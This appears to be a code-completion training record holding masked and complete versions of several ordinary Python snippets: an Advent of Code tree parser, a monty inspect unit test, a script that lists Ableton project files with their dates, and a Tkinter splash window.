self._solve(license_input.split(' '), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result <|reserved_special_token_1|> class Day8MemoryManeuver: def __init__(self, use_reference_count=False): """ Args: use_reference_count (bool): True: If an entry has child nodes, the meta data are referring to the results of the child node False: Sum all meta data up """ self._use_child_references = use_reference_count def solve(self, license_input): _, result = self._solve(license_input.split(" "), 0) return result def _solve(self, structure, pos): if pos >= len(structure): return pos, 0 child_node_count = int(structure[pos]) pos += 1 meta_count = int(structure[pos]) result = 0 child_results = [] for i in range(child_node_count): pos += 1 pos, tmp = self._solve(structure, pos) if not self._use_child_references: result += tmp child_results.append(tmp) if meta_count > 0: for i in range(pos, pos + meta_count): current = int(structure[i + 1]) if self._use_child_references and child_node_count > 0: if current <= len(child_results): result += child_results[current - 1] else: result += current pos += 1 return pos, result
flexible
{ "blob_id": "84d096a51fa052ee210e975ab61c0cbbf05bc5ae", "index": 8358, "step-1": "class Day8MemoryManeuver:\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "class Day8MemoryManeuver:\n <mask token>\n <mask token>\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-3": "class Day8MemoryManeuver:\n <mask token>\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(' '), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-4": "class Day8MemoryManeuver:\n\n def __init__(self, use_reference_count=False):\n \"\"\"\n Args:\n use_reference_count (bool):\n True: If an entry has child nodes, the meta data are referring to the results of\n the child node\n False: Sum all meta data up\n \"\"\"\n 
self._use_child_references = use_reference_count\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(' '), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-5": "class Day8MemoryManeuver:\n def __init__(self, use_reference_count=False):\n \"\"\"\n Args:\n use_reference_count (bool):\n True: If an entry has child nodes, the meta data are referring to the results of\n the child node\n False: Sum all meta data up\n \"\"\"\n self._use_child_references = use_reference_count\n\n def solve(self, license_input):\n _, result = self._solve(license_input.split(\" \"), 0)\n return result\n\n def _solve(self, structure, pos):\n if pos >= len(structure):\n return pos, 0\n child_node_count = int(structure[pos])\n pos += 1\n meta_count = int(structure[pos])\n result = 0\n child_results = []\n for i in range(child_node_count):\n pos += 1\n pos, tmp = self._solve(structure, pos)\n if not self._use_child_references:\n result += tmp\n child_results.append(tmp)\n if meta_count > 0:\n for i in range(pos, pos + meta_count):\n current = int(structure[i + 1])\n if self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) <|reserved_special_token_0|> <|reserved_special_token_1|> from __future__ import division, unicode_literals import unittest from monty.inspect import * class LittleCatA(object): pass class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) if __name__ == '__main__': unittest.main() <|reserved_special_token_1|> # coding: utf-8 from __future__ import division, unicode_literals import unittest from monty.inspect import * class LittleCatA(object): pass class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): # Not a real test. Need something better. 
self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) if __name__ == "__main__": unittest.main()
flexible
{ "blob_id": "89605ff723d2f78e85cae458d576494718b5d456", "index": 1193, "step-1": "<mask token>\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass LittleCatB(LittleCatA):\n pass\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\n<mask token>\n", "step-4": "from __future__ import division, unicode_literals\nimport unittest\nfrom monty.inspect import *\n\n\nclass LittleCatA(object):\n pass\n\n\nclass LittleCatB(LittleCatA):\n pass\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\nif __name__ == '__main__':\n unittest.main()\n", "step-5": "# coding: utf-8\nfrom __future__ import division, unicode_literals\n\nimport unittest\n\nfrom monty.inspect import *\n\nclass LittleCatA(object):\n pass\n\nclass LittleCatB(LittleCatA):\n pass\n\nclass LittleCatC(object):\n pass\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n # Not a real test. 
Need something better.\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "step-ids": [ 2, 5, 6, 9, 10 ] }
[ 2, 5, 6, 9, 10 ]
<|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime <|reserved_special_token_0|> def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. 
""" if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. 
""" if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles <|reserved_special_token_0|> print(dirs) print(collectElements(dirs)) <|reserved_special_token_0|> for item in fileList(filePath): file.write(os.path.basename(item) + ', ' + convertIntToTimestamp( get_lastupdate_date(item)) + ', ' + convertIntToTimestamp( creation_date(item)) + ', ' + os.path.abspath(item) + '\n') file.close with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path']) for item in fileList(filePath): a.writerow([os.path.basename(item), convertIntToTimestamp( get_lastupdate_date(item)), convertIntToTimestamp(creation_date (item)), os.path.abspath(item)]) <|reserved_special_token_1|> import os, sys, datetime, csv, platform def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. 
""" if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles subpath = [] subdirs = [] thefiles = [] thelist = [] filePath = '/Users/blakenicholson/Dropbox/Ableton Projects' dirs = mylistdir(filePath) print(dirs) print(collectElements(dirs)) file = open('testtext.txt', 'w+') for item in fileList(filePath): file.write(os.path.basename(item) + ', ' + convertIntToTimestamp( get_lastupdate_date(item)) + ', ' + convertIntToTimestamp( creation_date(item)) + ', ' + os.path.abspath(item) + '\n') file.close with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path']) for item in fileList(filePath): a.writerow([os.path.basename(item), convertIntToTimestamp( get_lastupdate_date(item)), convertIntToTimestamp(creation_date (item)), os.path.abspath(item)]) <|reserved_special_token_1|> import os, sys, datetime, csv, platform ####FUNCTIONS#### #Get Creation Time def get_lastupdate_date(path): return os.path.getmtime(path) #Get Date From String def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) #Get Filename def getFilename(name): return os.path.basename(name) # Get File Creation Time def creation_date(path): """ Try to get the 
date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: # We're probably on Linux. No easy way to get creation dates here, # so we'll settle for when its content was last modified. return stat.st_mtime #Print List def print_list(x): for i in range(0,len(x)): print(x[i]) return x #Listing Files def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith((filetype)): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not (x.startswith('.'))] def collectElements(dir): ## collecting elements into a list for directory in dir: for filename in directory: if filename.endswith(".als"): thefiles.append(filename) return thefiles ## INPUTDIRECTORIES subpath = [] subdirs = [] thefiles = [] thelist = [] ## Examples of Directories #/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects #/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project filePath = r"/Users/blakenicholson/Dropbox/Ableton Projects" #filePath = raw_input('File path would you like to use: ') dirs = mylistdir(filePath) print(dirs) print(collectElements(dirs)) #Writes contents of filePath to a txt file file = open("testtext.txt","w+") for item in fileList(filePath): file.write(os.path.basename(item) +", "+convertIntToTimestamp(get_lastupdate_date(item))+", "+convertIntToTimestamp(creation_date(item))+", "+os.path.abspath(item)+"\n") file.close #convert txt -> csv with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, 
delimiter=',') a.writerow(['File Name','Updated Date','Created Date','Path']) for item in fileList(filePath): a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])
flexible
{ "blob_id": "e83b6b1f4cb12fe3b932903eddddfb0dc0e7d98d", "index": 2765, "step-1": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\n<mask token>\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef 
mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\nprint(dirs)\nprint(collectElements(dirs))\n<mask token>\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + 
convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n", "step-4": "import os, sys, datetime, csv, platform\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\nfilePath = '/Users/blakenicholson/Dropbox/Ableton Projects'\ndirs = 
mylistdir(filePath)\nprint(dirs)\nprint(collectElements(dirs))\nfile = open('testtext.txt', 'w+')\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n", "step-5": "import os, sys, datetime, csv, platform\n\n####FUNCTIONS####\n\n#Get Creation Time\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n \n#Get Date From String\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n#Get Filename\ndef getFilename(name):\n return os.path.basename(name)\n\n# Get File Creation Time\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. 
No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n#Print List\ndef print_list(x):\n\tfor i in range(0,len(x)):\n\t\tprint(x[i])\n\treturn x\n\n#Listing Files\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith((filetype)):\n matches.append(os.path.join(root, filename))\n return matches\n\t\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist\n if not (x.startswith('.'))]\n\ndef collectElements(dir):\n ## collecting elements into a list\n for directory in dir:\n for filename in directory:\n if filename.endswith(\".als\"):\n thefiles.append(filename) \n return thefiles\n\n\n## INPUTDIRECTORIES\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\n\n## Examples of Directories\n#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects\n#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project\n\nfilePath = r\"/Users/blakenicholson/Dropbox/Ableton Projects\"\n#filePath = raw_input('File path would you like to use: ')\ndirs = mylistdir(filePath)\nprint(dirs)\n\n\nprint(collectElements(dirs))\n\n#Writes contents of filePath to a txt file\nfile = open(\"testtext.txt\",\"w+\")\nfor item in fileList(filePath):\n file.write(os.path.basename(item) +\", \"+convertIntToTimestamp(get_lastupdate_date(item))+\", \"+convertIntToTimestamp(creation_date(item))+\", \"+os.path.abspath(item)+\"\\n\") \nfile.close\n\n#convert txt -> csv\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name','Updated Date','Created Date','Path'])\n for item in fileList(filePath):\n a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), 
convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])\n ", "step-ids": [ 5, 8, 9, 11, 12 ] }
[ 5, 8, 9, 11, 12 ]
<|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) <|reserved_special_token_0|> root.title('3 Second Splash') root.geometry('250x250') <|reserved_special_token_0|> b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> <|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) root = Tk() root.title('3 Second Splash') root.geometry('250x250') b = Button(root, text='Launch splash window', command=create_window) b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> from Tkinter import * import time def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) 
window.after(3000, lambda : window.destroy()) root = Tk() root.title('3 Second Splash') root.geometry('250x250') b = Button(root, text='Launch splash window', command=create_window) b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> from Tkinter import * import time def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window,width=w,height=h) canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial") canvas.pack() window.overrideredirect(1) window.geometry("%dx%d+0+0" % (w, h)) window.after(3000, lambda: window.destroy()) root = Tk() root.title("3 Second Splash") root.geometry("250x250") b = Button(root, text="Launch splash window", command=create_window) b.place(relx=0.5,rely=0.5,anchor=CENTER) #b.pack() root.mainloop()
flexible
{ "blob_id": "cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb", "index": 9562, "step-1": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\nroot.title('3 Second Splash')\nroot.geometry('250x250')\n<mask token>\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-3": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-4": "from Tkinter import *\nimport time\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n 
